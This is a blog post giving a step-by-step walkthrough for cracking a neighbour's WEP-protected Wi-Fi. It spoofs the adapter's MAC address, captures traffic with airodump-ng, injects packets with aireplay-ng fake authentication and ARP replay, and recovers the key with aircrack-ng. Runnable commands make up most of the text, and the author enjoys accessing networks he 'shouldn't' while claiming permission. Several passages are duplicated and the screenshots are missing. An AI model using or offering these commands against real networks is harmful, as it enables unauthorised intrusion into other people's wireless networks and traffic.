one
of my favorite things to do in backtrack is to crack a good ole WIFI.
It can lead to so many different options and really brings me back to my
roots as to why i stumbled upon backtrack in the first place. I guess
it's just thrilling, it gives me sort of a high to be in places i
shouldn't. To be able to completely exploit an entire network as a local
user is definitely something that's fun an exciting. I do want to
stress the fact that even though we've all maybe done it once or twice,
Black Hat hacking is entirely unethical and not condoned here. I may
sound hypocritical, but i do not do anything malicious to the machines i
exploit. I have permission to do so. This is an Ethical Hackers website
for information and security purposes only.
I'm
Far from a pro-hacker. I'm Maybe intermediate at best. if anything
looks out of the ordinary feel free to email me with any questions or
tips. I don't claim to be the best; i'm still learning. However, what i
have learned thus far i'm willing to share so here goes:
Today
I'm going to demonstrate how insecure the WEP encryption is through
wifi. In Today's world you have a lot of people that like to set it and
forget it. I'm sure most readers have heard of Verizon, a poineer in
telecom. Well in my area Verizon offers high speed internet DSL and
FIOS. Great service most of the time. The problem is their Westell DSL
modems/WIFI routers come preset to use the WEP encryption. I really wish
they would catch on to this. My neighbor has DSL through Verizon.
Westell Modem, WEP WIFI!
lets see what we can do!
We will be using the AIR tools, fun fun.
Fire up a shell and run commands as following
1. airmon-ng
wlan1 is my interface. these can be variable so yours may be different
next, with the information airmon has given you (wlan1) for an interface you want to run these 4 commands.
1. airmon-ng stop wlan1 (Stops the wlan1 interface)
2. ifconfig wlan1 down (wlan1 no longer in use)
3. macchanger --mac 00:11:22:33:44:55 wlan1 (spoofs the mac address)
4. airmon-ng start wlan1 (restarts the interface with new mac)
Below is what it looked like for me.
next, with the information airmon has given you (wlan1) for an interface you want to run these 4 commands.
1. airmon-ng stop wlan1 (Stops the wlan1 interface)
2. ifconfig wlan1 down (wlan1 no longer in use)
3. macchanger --mac 00:11:22:33:44:55 wlan1 (spoofs the mac address)
4. airmon-ng start wlan1 (restarts the interface with new mac)
Below is what it looked like for me.
In
Some situations your Network adapter may not be supported. i will
compile a list of supported network adapters in the future. or you can
google it.
I have this one:
However if it did work then you have successfully faked the mac and it's time to keep on moving.
Next thing; and this is obviously important, is to pick a network. do this by running this command
1. airodump-ng wlan1 (MAKE SURE YOUR USING YOUR INTERFACE)
after you run the command, wait a few minutes to get an accurate read on what's out there for wireless networks. hit CTRL+C to cancel the running application and choose a good network that is WEP
i have the network i want to crack in my crosshairs. It's highlighted below:
I have this one:
However if it did work then you have successfully faked the mac and it's time to keep on moving.
Next thing; and this is obviously important, is to pick a network. do this by running this command
1. airodump-ng wlan1 (MAKE SURE YOUR USING YOUR INTERFACE)
after you run the command, wait a few minutes to get an accurate read on what's out there for wireless networks. hit CTRL+C to cancel the running application and choose a good network that is WEP
i have the network i want to crack in my crosshairs. It's highlighted below:
The
next thing we must do is configure airodump-ng to watch that specific
network and capture the unique data holding the password and put it into
a file (hackedwifi) or whatever you decide to name it.
the command is as follows:
1. airodump-ng -c (channel) -w (filename) --bssid (bssid) (interface)
for me it looks like this:
airodump-ng -c 6 -w hackedwifi --bssid 00:12:0E:55:29:13 wlan1
the command is as follows:
1. airodump-ng -c (channel) -w (filename) --bssid (bssid) (interface)
for me it looks like this:
airodump-ng -c 6 -w hackedwifi --bssid 00:12:0E:55:29:13 wlan1
This is what your output should look like:
Keep in mind rather than opening several terminals i like to tab them using CTRL+SHIFT+T
While you have airodump running, in a seperate terminal run this command
1. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
for me the command looks like this
aireplay-ng -1 0 -a 00:12:0E:55:29:13 -h 00:11:22:33:44:55 -e 06B409983674 wlan1
In most cases, and in what you want to happen is output saying "association successful" with a smiley face. This is good and if you get this output you are on the right track. If not email me and i will feel free to help you out
While you have airodump running, in a seperate terminal run this command
1. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
for me the command looks like this
aireplay-ng -1 0 -a 00:12:0E:55:29:13 -h 00:11:22:33:44:55 -e 06B409983674 wlan1
In most cases, and in what you want to happen is output saying "association successful" with a smiley face. This is good and if you get this output you are on the right track. If not email me and i will feel free to help you out
Now
that you are associated with the Access point we need to use
aireplay-ng to create an abundance of data on the network so we can
sniff out the encrypted PW. Run this command:
1. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
for me it looks like this:
aireplay-ng -3 -b 00:12:0E:55:29:13 -h 00:11:22:33:44:55 wlan1
Now
it's time to wait. You will notice Airodump going crazy collecting
data. Personally, sometimes i leave the room or go do something else for
about 20 minutes. What you want is to collect enough Data for the
cracker. watch the #Data column. i like to wait until it's between
10,000 and 20,000 before i run the cracker.
Ok, it's been about a half hr and it's time to run the cracker. run this command.
1. aircrack-ng -b (bssid) (filename-01.cap)
if you forgot yourfile just type "dir" and it will be a .cap file.
mine looks like this
aircrack-ng -b 00:12:0E:55:29:13 hackedwifi-01.cap
Ok, it's been about a half hr and it's time to run the cracker. run this command.
1. aircrack-ng -b (bssid) (filename-01.cap)
if you forgot yourfile just type "dir" and it will be a .cap file.
mine looks like this
aircrack-ng -b 00:12:0E:55:29:13 hackedwifi-01.cap
If you did not sniff enough data it will look like this:
And IF you did it will look like this:
The Key to the wireless network is: 6HSKV
to prove it worked i took a screenshot in win7
to prove it worked i took a screenshot in win7
0 comments:
Post a Comment